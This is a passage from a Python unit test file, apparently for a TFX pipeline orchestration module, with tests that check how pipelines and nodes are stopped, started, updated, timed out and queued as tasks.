pipeline=_test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC)))
def test_stop_pipeline_wait_for_inactivation(self, pipeline):
with self._mlmd_connection as m:
pipeline_state = pipeline_ops.initiate_pipeline_start(m, pipeline)
def _inactivate(pipeline_state):
time.sleep(2.0)
with pipeline_ops._PIPELINE_OPS_LOCK:
with pipeline_state:
pipeline_state.set_pipeline_execution_state(
metadata_store_pb2.Execution.COMPLETE)
thread = threading.Thread(target=_inactivate, args=(pipeline_state,))
thread.start()
pipeline_ops.stop_pipeline(
m, task_lib.PipelineUid.from_pipeline(pipeline), timeout_secs=20.0)
thread.join()
@parameterized.named_parameters(
dict(testcase_name='async', pipeline=_test_pipeline('pipeline1')),
dict(
testcase_name='sync',
pipeline=_test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC)))
def test_stop_pipeline_wait_for_inactivation_timeout(self, pipeline):
with self._mlmd_connection as m:
pipeline_ops.initiate_pipeline_start(m, pipeline)
with self.assertRaisesRegex(
status_lib.StatusNotOkError,
'Timed out.*waiting for execution inactivation.'
) as exception_context:
pipeline_ops.stop_pipeline(
m, task_lib.PipelineUid.from_pipeline(pipeline), timeout_secs=1.0)
self.assertEqual(status_lib.Code.DEADLINE_EXCEEDED,
exception_context.exception.code)
def test_stop_node_no_active_executions(self):
pipeline = test_async_pipeline.create_pipeline()
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
node_uid = task_lib.NodeUid(node_id='my_trainer', pipeline_uid=pipeline_uid)
with self._mlmd_connection as m:
pstate.PipelineState.new(m, pipeline)
pipeline_ops.stop_node(m, node_uid)
pipeline_state = pstate.PipelineState.load(m, pipeline_uid)
# The node state should be STOPPING even when node is inactive to prevent
# future triggers.
with pipeline_state:
node_state = pipeline_state.get_node_state(node_uid)
self.assertEqual(status_lib.Code.CANCELLED, node_state.status.code)
self.assertEqual(pstate.NodeState.STOPPING, node_state.state)
# Restart node.
pipeline_state = pipeline_ops.initiate_node_start(m, node_uid)
with pipeline_state:
node_state = pipeline_state.get_node_state(node_uid)
self.assertEqual(pstate.NodeState.STARTING, node_state.state)
def test_stop_node_wait_for_inactivation(self):
pipeline = test_async_pipeline.create_pipeline()
trainer = pipeline.nodes[2].pipeline_node
test_utils.fake_component_output(
self._mlmd_connection, trainer, active=True)
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
node_uid = task_lib.NodeUid(node_id='my_trainer', pipeline_uid=pipeline_uid)
with self._mlmd_connection as m:
pstate.PipelineState.new(m, pipeline)
def _inactivate(execution):
time.sleep(2.0)
with pipeline_ops._PIPELINE_OPS_LOCK:
execution.last_known_state = metadata_store_pb2.Execution.COMPLETE
m.store.put_executions([execution])
execution = task_gen_utils.get_executions(m, trainer)[0]
thread = threading.Thread(
target=_inactivate, args=(copy.deepcopy(execution),))
thread.start()
pipeline_ops.stop_node(m, node_uid, timeout_secs=5.0)
thread.join()
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
node_state = pipeline_state.get_node_state(node_uid)
self.assertEqual(pstate.NodeState.STOPPING, node_state.state)
# Restart node.
with pipeline_ops.initiate_node_start(m, node_uid) as pipeline_state:
node_state = pipeline_state.get_node_state(node_uid)
self.assertEqual(pstate.NodeState.STARTING, node_state.state)
def test_stop_node_wait_for_inactivation_timeout(self):
pipeline = test_async_pipeline.create_pipeline()
trainer = pipeline.nodes[2].pipeline_node
test_utils.fake_component_output(
self._mlmd_connection, trainer, active=True)
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
node_uid = task_lib.NodeUid(node_id='my_trainer', pipeline_uid=pipeline_uid)
with self._mlmd_connection as m:
pstate.PipelineState.new(m, pipeline)
with self.assertRaisesRegex(
status_lib.StatusNotOkError,
'Timed out.*waiting for execution inactivation.'
) as exception_context:
pipeline_ops.stop_node(m, node_uid, timeout_secs=1.0)
self.assertEqual(status_lib.Code.DEADLINE_EXCEEDED,
exception_context.exception.code)
# Even if `wait_for_inactivation` times out, the node should be in state
# STOPPING or STOPPED to prevent future triggers.
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
node_state = pipeline_state.get_node_state(node_uid)
self.assertIn(node_state.state,
(pstate.NodeState.STOPPING, pstate.NodeState.STOPPED))
@mock.patch.object(sync_pipeline_task_gen, 'SyncPipelineTaskGenerator')
@mock.patch.object(async_pipeline_task_gen, 'AsyncPipelineTaskGenerator')
def test_orchestrate_active_pipelines(self, mock_async_task_gen,
mock_sync_task_gen):
with self._mlmd_connection as m:
# Sync and async active pipelines.
async_pipelines = [
_test_pipeline('pipeline1'),
_test_pipeline('pipeline2'),
]
sync_pipelines = [
_test_pipeline('pipeline3', pipeline_pb2.Pipeline.SYNC),
_test_pipeline('pipeline4', pipeline_pb2.Pipeline.SYNC),
]
for pipeline in async_pipelines + sync_pipelines:
pipeline_ops.initiate_pipeline_start(m, pipeline)
# Active executions for active async pipelines.
mock_async_task_gen.return_value.generate.side_effect = [
[
test_utils.create_exec_node_task(
task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid.from_pipeline(
async_pipelines[0]),
node_id='Transform'))
],
[
test_utils.create_exec_node_task(
task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid.from_pipeline(
async_pipelines[1]),
node_id='Trainer'))
],
]
# Active executions for active sync pipelines.
mock_sync_task_gen.return_value.generate.side_effect = [
[
test_utils.create_exec_node_task(
task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid.from_pipeline(
sync_pipelines[0]),
node_id='Trainer'))
],
[
test_utils.create_exec_node_task(
task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid.from_pipeline(
sync_pipelines[1]),
node_id='Validator'))
],
]
task_queue = tq.TaskQueue()
pipeline_ops.orchestrate(m, task_queue,
service_jobs.DummyServiceJobManager())
self.assertEqual(2, mock_async_task_gen.return_value.generate.call_count)
self.assertEqual(2, mock_sync_task_gen.return_value.generate.call_count)
# Verify that tasks are enqueued in the expected order.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_exec_node_task(task))
self.assertEqual(
test_utils.create_node_uid('pipeline1', 'Transform'), task.node_uid)
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_exec_node_task(task))
self.assertEqual(
test_utils.create_node_uid('pipeline2', 'Trainer'), task.node_uid)
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_exec_node_task(task))
self.assertEqual(
test_utils.create_node_uid('pipeline3', 'Trainer'), task.node_uid)
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_exec_node_task(task))
self.assertEqual(
test_utils.create_node_uid('pipeline4', 'Validator'), task.node_uid)
self.assertTrue(task_queue.is_empty())
@parameterized.parameters(
_test_pipeline('pipeline1'),
_test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC))
@mock.patch.object(sync_pipeline_task_gen, 'SyncPipelineTaskGenerator')
@mock.patch.object(async_pipeline_task_gen, 'AsyncPipelineTaskGenerator')
@mock.patch.object(task_gen_utils, 'generate_task_from_active_execution')
def test_orchestrate_stop_initiated_pipelines(self, pipeline,
mock_gen_task_from_active,
mock_async_task_gen,
mock_sync_task_gen):
with self._mlmd_connection as m:
pipeline.nodes.add().pipeline_node.node_info.id = 'ExampleGen'
pipeline.nodes.add().pipeline_node.node_info.id = 'Transform'
pipeline.nodes.add().pipeline_node.node_info.id = 'Trainer'
pipeline.nodes.add().pipeline_node.node_info.id = 'Evaluator'
mock_service_job_manager = mock.create_autospec(
service_jobs.ServiceJobManager, instance=True)
mock_service_job_manager.is_pure_service_node.side_effect = (
lambda _, node_id: node_id == 'ExampleGen')
mock_service_job_manager.is_mixed_service_node.side_effect = (
lambda _, node_id: node_id == 'Transform')
pipeline_ops.initiate_pipeline_start(m, pipeline)
with pstate.PipelineState.load(
m, task_lib.PipelineUid.from_pipeline(pipeline)) as pipeline_state:
pipeline_state.initiate_stop(
status_lib.Status(code=status_lib.Code.CANCELLED))
pipeline_execution_id = pipeline_state.execution_id
task_queue = tq.TaskQueue()
# For the stop-initiated pipeline, "Transform" execution task is in queue,
# "Trainer" has an active execution in MLMD but no task in queue,
# "Evaluator" has no active execution.
task_queue.enqueue(
test_utils.create_exec_node_task(
task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid.from_pipeline(pipeline),
node_id='Transform')))
transform_task = task_queue.dequeue() # simulates task being processed
mock_gen_task_from_active.side_effect = [
test_utils.create_exec_node_task(
node_uid=task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid.from_pipeline(pipeline),
node_id='Trainer'),
is_cancelled=True), None, None, None, None
]
pipeline_ops.orchestrate(m, task_queue, mock_service_job_manager)
# There are no active pipelines so these shouldn't be called.
mock_async_task_gen.assert_not_called()
mock_sync_task_gen.assert_not_called()
# stop_node_services should be called for ExampleGen which is a pure
# service node.
mock_service_job_manager.stop_node_services.assert_called_once_with(
mock.ANY, 'ExampleGen')
mock_service_job_manager.reset_mock()
task_queue.task_done(transform_task) # Pop out transform task.
# CancelNodeTask for the "Transform" ExecNodeTask should be next.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_cancel_node_task(task))
self.assertEqual('Transform', task.node_uid.node_id)
# ExecNodeTask (with is_cancelled=True) for "Trainer" is next.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_exec_node_task(task))
self.assertEqual('Trainer', task.node_uid.node_id)
self.assertTrue(task.is_cancelled)
self.assertTrue(task_queue.is_empty())
mock_gen_task_from_active.assert_has_calls([
mock.call(
m,
pipeline_state.pipeline,
pipeline.nodes[2].pipeline_node,
mock.ANY,
is_cancelled=True),
mock.call(
m,
pipeline_state.pipeline,
pipeline.nodes[3].pipeline_node,
mock.ANY,
is_cancelled=True)
])
self.assertEqual(2, mock_gen_task_from_active.call_count)
# Pipeline execution should continue to be active since active node
# executions were found in the last call to `orchestrate`.
[execution] = m.store.get_executions_by_id([pipeline_execution_id])
self.assertTrue(execution_lib.is_execution_active(execution))
# Call `orchestrate` again; this time there are no more active node
# executions so the pipeline should be marked as cancelled.
pipeline_ops.orchestrate(m, task_queue, mock_service_job_manager)
self.assertTrue(task_queue.is_empty())
[execution] = m.store.get_executions_by_id([pipeline_execution_id])
self.assertEqual(metadata_store_pb2.Execution.CANCELED,
execution.last_known_state)
# stop_node_services should be called on both ExampleGen and Transform
# which are service nodes.
mock_service_job_manager.stop_node_services.assert_has_calls(
[mock.call(mock.ANY, 'ExampleGen'),
mock.call(mock.ANY, 'Transform')],
any_order=True)
@parameterized.parameters(
_test_pipeline('pipeline1'),
_test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC))
def test_orchestrate_update_initiated_pipelines(self, pipeline):
with self._mlmd_connection as m:
pipeline.nodes.add().pipeline_node.node_info.id = 'ExampleGen'
pipeline.nodes.add().pipeline_node.node_info.id = 'Transform'
pipeline.nodes.add().pipeline_node.node_info.id = 'Trainer'
pipeline.nodes.add().pipeline_node.node_info.id = 'Evaluator'
mock_service_job_manager = mock.create_autospec(
service_jobs.ServiceJobManager, instance=True)
mock_service_job_manager.is_pure_service_node.side_effect = (
lambda _, node_id: node_id == 'ExampleGen')
mock_service_job_manager.is_mixed_service_node.side_effect = (
lambda _, node_id: node_id == 'Transform')
pipeline_ops.initiate_pipeline_start(m, pipeline)
task_queue = tq.TaskQueue()
for node_id in ('Transform', 'Trainer', 'Evaluator'):
task_queue.enqueue(
test_utils.create_exec_node_task(
task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid.from_pipeline(pipeline),
node_id=node_id)))
pipeline_state = pipeline_ops._initiate_pipeline_update(m, pipeline)
with pipeline_state:
self.assertTrue(pipeline_state.is_update_initiated())
pipeline_ops.orchestrate(m, task_queue, mock_service_job_manager)
# stop_node_services should be called for ExampleGen which is a pure
# service node.
mock_service_job_manager.stop_node_services.assert_called_once_with(
mock.ANY, 'ExampleGen')
mock_service_job_manager.reset_mock()
# Simulate completion of all the exec node tasks.
for node_id in ('Transform', 'Trainer', 'Evaluator'):
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_exec_node_task(task))
self.assertEqual(node_id, task.node_uid.node_id)
# Verify that cancellation tasks were enqueued in the last `orchestrate`
# call, and dequeue them.
for node_id in ('Transform', 'Trainer', 'Evaluator'):
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_cancel_node_task(task))
self.assertEqual(node_id, task.node_uid.node_id)
self.assertTrue(task.pause)
self.assertTrue(task_queue.is_empty())
# Pipeline continues to be in update initiated state until all
# ExecNodeTasks have been dequeued (which was not the case when last
# `orchestrate` call was made).
with pipeline_state:
self.assertTrue(pipeline_state.is_update_initiated())
pipeline_ops.orchestrate(m, task_queue, mock_service_job_manager)
# stop_node_services should be called for Transform (mixed service node)
# too since corresponding ExecNodeTask has been processed.
mock_service_job_manager.stop_node_services.assert_has_calls(
[mock.call(mock.ANY, 'ExampleGen'),
mock.call(mock.ANY, 'Transform')])
# Pipeline should no longer be in update-initiated state but be active.
with pipeline_state:
self.assertFalse(pipeline_state.is_update_initiated())
self.assertTrue(pipeline_state.is_active())
def test_update_pipeline_waits_for_update_application(self):
with self._mlmd_connection as m:
pipeline = _test_pipeline('pipeline1')
pipeline_state = pipeline_ops.initiate_pipeline_start(m, pipeline)
def _apply_update(pipeline_state):
# Wait for the pipeline to be in update initiated state.
while True:
with pipeline_state:
if pipeline_state.is_update_initiated():
break
time.sleep(0.5)
# Now apply the update.
with pipeline_ops._PIPELINE_OPS_LOCK:
with pipeline_state:
pipeline_state.apply_pipeline_update()
thread = threading.Thread(target=_apply_update, args=(pipeline_state,))
thread.start()
pipeline_ops.update_pipeline(m, pipeline, timeout_secs=10.0)
thread.join()
def test_update_pipeline_wait_for_update_timeout(self):
with self._mlmd_connection as m:
pipeline = _test_pipeline('pipeline1')
pipeline_ops.initiate_pipeline_start(m, pipeline)
with self.assertRaisesRegex(status_lib.StatusNotOkError,
'Timed out.*waiting for pipeline update'):
pipeline_ops.update_pipeline(m, pipeline, timeout_secs=3.0)
@parameterized.parameters(
_test_pipeline('pipeline1'),
_test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC))
@mock.patch.object(sync_pipeline_task_gen, 'SyncPipelineTaskGenerator')
@mock.patch.object(async_pipeline_task_gen, 'AsyncPipelineTaskGenerator')
@mock.patch.object(task_gen_utils, 'generate_task_from_active_execution')
def test_active_pipelines_with_stopped_nodes(self, pipeline,
mock_gen_task_from_active,
mock_async_task_gen,
mock_sync_task_gen):
if pipeline.execution_mode == pipeline_pb2.Pipeline.SYNC:
mock_task_gen = mock_sync_task_gen
else:
mock_task_gen = mock_async_task_gen
with self._mlmd_connection as m:
pipeline.nodes.add().pipeline_node.node_info.id = 'ExampleGen'
pipeline.nodes.add().pipeline_node.node_info.id = 'Transform'
pipeline.nodes.add().pipeline_node.node_info.id = 'Trainer'
pipeline.nodes.add().pipeline_node.node_info.id = 'Evaluator'
mock_service_job_manager = mock.create_autospec(
service_jobs.ServiceJobManager, instance=True)
mock_service_job_manager.is_pure_service_node.side_effect = (
lambda _, node_id: node_id == 'ExampleGen')
example_gen_node_uid = task_lib.NodeUid.from_pipeline_node(
pipeline, pipeline.nodes[0].pipeline_node)
transform_node_uid = task_lib.NodeUid.from_pipeline_node(
pipeline, pipeline.nodes[1].pipeline_node)
transform_task = test_utils.create_exec_node_task(
node_uid=transform_node_uid)
trainer_node_uid = task_lib.NodeUid.from_pipeline_node(
pipeline, pipeline.nodes[2].pipeline_node)
trainer_task = test_utils.create_exec_node_task(node_uid=trainer_node_uid)
evaluator_node_uid = task_lib.NodeUid.from_pipeline_node(
pipeline, pipeline.nodes[3].pipeline_node)
evaluator_task = test_utils.create_exec_node_task(
node_uid=evaluator_node_uid)
cancelled_evaluator_task = test_utils.create_exec_node_task(
node_uid=evaluator_node_uid, is_cancelled=True)
pipeline_ops.initiate_pipeline_start(m, pipeline)
with pstate.PipelineState.load(
m, task_lib.PipelineUid.from_pipeline(pipeline)) as pipeline_state:
# Stop example-gen, trainer and evaluator.
with pipeline_state.node_state_update_context(
example_gen_node_uid) as node_state:
node_state.update(pstate.NodeState.STOPPING,
status_lib.Status(code=status_lib.Code.CANCELLED))
with pipeline_state.node_state_update_context(
trainer_node_uid) as node_state:
node_state.update(pstate.NodeState.STOPPING,
status_lib.Status(code=status_lib.Code.CANCELLED))
with pipeline_state.node_state_update_context(
evaluator_node_uid) as node_state:
node_state.update(pstate.NodeState.STOPPING,
status_lib.Status(code=status_lib.Code.ABORTED))
task_queue = tq.TaskQueue()
# Simulate a new transform execution being triggered.
mock_task_gen.return_value.generate.return_value = [transform_task]
# Simulate ExecNodeTask for trainer already present in the task queue.
task_queue.enqueue(trainer_task)
# Simulate Evaluator having an active execution in MLMD.
mock_gen_task_from_active.side_effect = [evaluator_task]
pipeline_ops.orchestrate(m, task_queue, mock_service_job_manager)
self.assertEqual(1, mock_task_gen.return_value.generate.call_count)
# stop_node_services should be called on example-gen which is a pure
# service node.
mock_service_job_manager.stop_node_services.assert_called_once_with(
mock.ANY, 'ExampleGen')
# Verify that tasks are enqueued in the expected order:
# Pre-existing trainer task.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertEqual(trainer_task, task)
# CancelNodeTask for trainer.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_cancel_node_task(task))
self.assertEqual(trainer_node_uid, task.node_uid)
# ExecNodeTask with is_cancelled=True for evaluator.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(cancelled_evaluator_task, task)
# ExecNodeTask for newly triggered transform node.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertEqual(transform_task, task)
# No more tasks.
self.assertTrue(task_queue.is_empty())
@mock.patch.object(sync_pipeline_task_gen, 'SyncPipelineTaskGenerator')
def test_handling_finalize_pipeline_task(self, task_gen):
with self._mlmd_connection as m:
pipeline = _test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC)
pipeline_ops.initiate_pipeline_start(m, pipeline)
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
finalize_reason = status_lib.Status(
code=status_lib.Code.ABORTED, message='foo bar')
task_gen.return_value.generate.side_effect = [
[
task_lib.FinalizePipelineTask(
pipeline_uid=pipeline_uid, status=finalize_reason)
],
]
task_queue = tq.TaskQueue()
pipeline_ops.orchestrate(m, task_queue,
service_jobs.DummyServiceJobManager())
task_gen.return_value.generate.assert_called_once()
self.assertTrue(task_queue.is_empty())
# Load pipeline state and verify stop initiation.
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
self.assertEqual(finalize_reason,
pipeline_state.stop_initiated_reason())
@mock.patch.object(async_pipeline_task_gen, 'AsyncPipelineTaskGenerator')
def test_handling_finalize_node_task(self, task_gen):
with self._mlmd_connection as m:
pipeline = _test_pipeline('pipeline1')
pipeline.nodes.add().pipeline_node.node_info.id = 'Transform'
pipeline.nodes.add().pipeline_node.node_info.id = 'Trainer'
pipeline_ops.initiate_pipeline_start(m, pipeline)
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
finalize_reason = status_lib.Status(
code=status_lib.Code.ABORTED, message='foo bar')
transform_node_uid = task_lib.NodeUid(
pipeline_uid=pipeline_uid, node_id='Transform')
trainer_node_uid = task_lib.NodeUid(
pipeline_uid=pipeline_uid, node_id='Trainer')
task_gen.return_value.generate.side_effect = [
[
test_utils.create_exec_node_task(transform_node_uid),
task_lib.FinalizeNodeTask(
node_uid=trainer_node_uid, status=finalize_reason)
],
]
task_queue = tq.TaskQueue()
pipeline_ops.orchestrate(m, task_queue,
service_jobs.DummyServiceJobManager())
task_gen.return_value.generate.assert_called_once()
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_exec_node_task(task))
self.assertEqual(transform_node_uid, task.node_uid)
# Load pipeline state and verify trainer node state.
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
node_state = pipeline_state.get_node_state(trainer_node_uid)
self.assertEqual(pstate.NodeState.STOPPING, node_state.state)
self.assertEqual(finalize_reason, node_state.status)
def test_to_status_not_ok_error_decorator(self):
@pipeline_ops._to_status_not_ok_error
def fn1():
raise RuntimeError('test error 1')
@pipeline_ops._to_status_not_ok_error
def fn2():
raise status_lib.StatusNotOkError(
code=status_lib.Code.ALREADY_EXISTS, message='test error 2')
with self.assertRaisesRegex(status_lib.StatusNotOkError,
'test error 1') as ctxt:
fn1()
self.assertEqual(status_lib.Code.UNKNOWN, ctxt.exception.code)
with self.assertRaisesRegex(status_lib.StatusNotOkError,
'test error 2') as ctxt:
fn2()
self.assertEqual(status_lib.Code.ALREADY_EXISTS, ctxt.exception.code)
@parameterized.parameters(
_test_pipeline('pipeline1'),
_test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC))
@mock.patch.object(sync_pipeline_task_gen, 'SyncPipelineTaskGenerator')
@mock.patch.object(async_pipeline_task_gen, 'AsyncPipelineTaskGenerator')
def test_executor_node_stop_then_start_flow(self, pipeline,
mock_async_task_gen,
mock_sync_task_gen):
service_job_manager = service_jobs.DummyServiceJobManager()
with self._mlmd_connection as m:
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
pipeline.nodes.add().pipeline_node.node_info.id = 'Trainer'
trainer_node_uid = task_lib.NodeUid.from_pipeline_node(
pipeline, pipeline.nodes[0].pipeline_node)
# Start pipeline and stop trainer.
pipeline_ops.initiate_pipeline_start(m, pipeline)
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
with pipeline_state.node_state_update_context(
trainer_node_uid) as node_state:
node_state.update(pstate.NodeState.STOPPING,
status_lib.Status(code=status_lib.Code.CANCELLED))
task_queue = tq.TaskQueue()
# Simulate ExecNodeTask for trainer already present in the task queue.
trainer_task = test_utils.create_exec_node_task(node_uid=trainer_node_uid)
task_queue.enqueue(trainer_task)
pipeline_ops.orchestrate(m, task_queue, service_job_manager)
# Dequeue pre-existing trainer task.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertEqual(trainer_task, task)
# Dequeue CancelNodeTask for trainer.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_cancel_node_task(task))
self.assertEqual(trainer_node_uid, task.node_uid)
self.assertTrue(task_queue.is_empty())
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
node_state = pipeline_state.get_node_state(trainer_node_uid)
self.assertEqual(pstate.NodeState.STOPPING, node_state.state)
self.assertEqual(status_lib.Code.CANCELLED, node_state.status.code)
pipeline_ops.orchestrate(m, task_queue, service_job_manager)
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
node_state = pipeline_state.get_node_state(trainer_node_uid)
self.assertEqual(pstate.NodeState.STOPPED, node_state.state)
self.assertEqual(status_lib.Code.CANCELLED, node_state.status.code)
pipeline_ops.initiate_node_start(m, trainer_node_uid)
pipeline_ops.orchestrate(m, task_queue, service_job_manager)
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
node_state = pipeline_state.get_node_state(trainer_node_uid)
self.assertEqual(pstate.NodeState.STARTED, node_state.state)
@parameterized.parameters(
_test_pipeline('pipeline1'),
_test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC))
@mock.patch.object(sync_pipeline_task_gen, 'SyncPipelineTaskGenerator')
@mock.patch.object(async_pipeline_task_gen, 'AsyncPipelineTaskGenerator')
def test_pure_service_node_stop_then_start_flow(self, pipeline,
mock_async_task_gen,
mock_sync_task_gen):
with self._mlmd_connection as m:
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
pipeline.nodes.add().pipeline_node.node_info.id = 'ExampleGen'
mock_service_job_manager = mock.create_autospec(
service_jobs.ServiceJobManager, instance=True)
mock_service_job_manager.is_pure_service_node.return_value = True
example_gen_node_uid = task_lib.NodeUid.from_pipeline_node(
pipeline, pipeline.nodes[0].pipeline_node)
pipeline_ops.initiate_pipeline_start(m, pipeline)
with pstate.PipelineState.load(
m, task_lib.PipelineUid.from_pipeline(pipeline)) as pipeline_state:
with pipeline_state.node_state_update_context(
example_gen_node_uid) as node_state:
node_state.update(pstate.NodeState.STOPPING,
status_lib.Status(code=status_lib.Code.CANCELLED))
task_queue = tq.TaskQueue()
pipeline_ops.orchestrate(m, task_queue, mock_service_job_manager)
# stop_node_services should be called for ExampleGen which is a pure
# service node.
mock_service_job_manager.stop_node_services.assert_called_once_with(
mock.ANY, 'ExampleGen')
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
node_state = pipeline_state.get_node_state(example_gen_node_uid)
self.assertEqual(pstate.NodeState.STOPPED, node_state.state)
self.assertEqual(status_lib.Code.CANCELLED, node_state.status.code)
pipeline_ops.initiate_node_start(m, example_gen_node_uid)
pipeline_ops.orchestrate(m, task_queue, mock_service_job_manager)
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
node_state = pipeline_state.get_node_state(example_gen_node_uid)
self.assertEqual(pstate.NodeState.STARTED, node_state.state)
@parameterized.parameters(
_test_pipeline('pipeline1'),
_test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC))
@mock.patch.object(sync_pipeline_task_gen, 'SyncPipelineTaskGenerator')
@mock.patch.object(async_pipeline_task_gen, 'AsyncPipelineTaskGenerator')
def test_mixed_service_node_stop_then_start_flow(self, pipeline,
mock_async_task_gen,
mock_sync_task_gen):
with self._mlmd_connection as m:
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
pipeline.nodes.add().pipeline_node.node_info.id = 'Transform'
mock_service_job_manager = mock.create_autospec(
service_jobs.ServiceJobManager, instance=True)
mock_service_job_manager.is_pure_service_node.return_value = False
mock_service_job_manager.is_mixed_service_node.return_value = True
transform_node_uid = task_lib.NodeUid.from_pipeline_node(
pipeline, pipeline.nodes[0].pipeline_node)
pipeline_ops.initiate_pipeline_start(m, pipeline)
with pstate.PipelineState.load(
m, task_lib.PipelineUid.from_pipeline(pipeline)) as pipeline_state:
# Stop Transform.
with pipeline_state.node_state_update_context(
transform_node_uid) as node_state:
node_state.update(pstate.NodeState.STOPPING,
status_lib.Status(code=status_lib.Code.CANCELLED))
task_queue = tq.TaskQueue()
# Simulate ExecNodeTask for Transform already present in the task queue.
transform_task = test_utils.create_exec_node_task(
node_uid=transform_node_uid)
task_queue.enqueue(transform_task)
pipeline_ops.orchestrate(m, task_queue, mock_service_job_manager)
# stop_node_services should not be called as there was an active
# ExecNodeTask for Transform which is a mixed service node.
mock_service_job_manager.stop_node_services.assert_not_called()
# Dequeue pre-existing transform task.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertEqual(transform_task, task)
# Dequeue CancelNodeTask for transform.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_cancel_node_task(task))
self.assertEqual(transform_node_uid, task.node_uid)
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
node_state = pipeline_state.get_node_state(transform_node_uid)
self.assertEqual(pstate.NodeState.STOPPING, node_state.state)
self.assertEqual(status_lib.Code.CANCELLED, node_state.status.code)
pipeline_ops.orchestrate(m, task_queue, mock_service_job_manager)
# stop_node_services should be called for Transform which is a mixed
# service node and corresponding ExecNodeTask has been dequeued.
mock_service_job_manager.stop_node_services.assert_called_once_with(
mock.ANY, 'Transform')
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
node_state = pipeline_state.get_node_state(transform_node_uid)
self.assertEqual(pstate.NodeState.STOPPED, node_state.state)
self.assertEqual(status_lib.Code.CANCELLED, node_state.status.code)
pipeline_ops.initiate_node_start(m, transform_node_uid)
pipeline_ops.orchestrate(m, task_queue, mock_service_job_manager)
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
node_state = pipeline_state.get_node_state(transform_node_uid)
self.assertEqual(pstate.NodeState.STARTED, node_state.state)
@mock.patch.object(time, 'sleep')
def test_wait_for_predicate_timeout_secs_None(self, mock_sleep):
predicate_fn = mock.Mock()
predicate_fn.side_effect = [False, False, False, True]
pipeline_ops._wait_for_predicate(predicate_fn, 'testing', None)
self.assertEqual(predicate_fn.call_count, 4)
self.assertEqual(mock_sleep.call_count, 3)
predicate_fn.reset_mock()
mock_sleep.reset_mock()
predicate_fn.side_effect = [False, False, ValueError('test error')]
with self.assertRaisesRegex(ValueError, 'test error'):
pipeline_ops._wait_for_predicate(predicate_fn, 'testing', None)
self.assertEqual(predicate_fn.call_count, 3)
self.assertEqual(mock_sleep.call_count, 2)
def test_resume_manual_node(self):
pipeline = test_manual_node.create_pipeline()
runtime_parameter_utils.substitute_runtime_parameter(
pipeline, {
constants.PIPELINE_RUN_ID_PARAMETER_NAME: 'test-pipeline-run',
})
manual_node = pipeline.nodes[0].pipeline_node
with self._mlmd_connection as m:
pstate.PipelineState.new(m, pipeline)
contexts = context_lib.prepare_contexts(m, manual_node.contexts)
execution = execution_publish_utils.register_execution(
m, manual_node.node_info.type, contexts)
with mlmd_state.mlmd_execution_atomic_op(
mlmd_handle=m, execution_id=execution.id) as execution:
node_state_mlmd_value = execution.custom_properties.get(
manual_task_scheduler.NODE_STATE_PROPERTY_KEY)
node_state = manual_task_scheduler.ManualNodeState.from_mlmd_value(
node_state_mlmd_value)
self.assertEqual(node_state.state,
manual_task_scheduler.ManualNodeState.WAITING)
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
node_uid = task_lib.NodeUid(
node_id=manual_node.node_info.id, pipeline_uid=pipeline_uid)
pipeline_ops.resume_manual_node(m, node_uid)
with mlmd_state.mlmd_execution_atomic_op(
mlmd_handle=m, execution_id=execution.id) as execution:
node_state_mlmd_value = execution.custom_properties.get(
